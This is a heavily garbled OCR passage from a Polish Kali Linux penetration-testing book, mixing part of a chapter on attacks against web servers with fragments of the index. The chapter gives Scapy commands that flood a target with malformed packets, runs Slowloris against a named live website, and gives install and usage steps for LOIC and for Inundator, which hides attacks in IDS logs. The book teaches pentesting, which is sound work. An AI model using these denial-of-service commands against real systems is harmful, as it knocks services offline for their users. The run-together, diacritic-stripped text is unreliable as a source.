adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
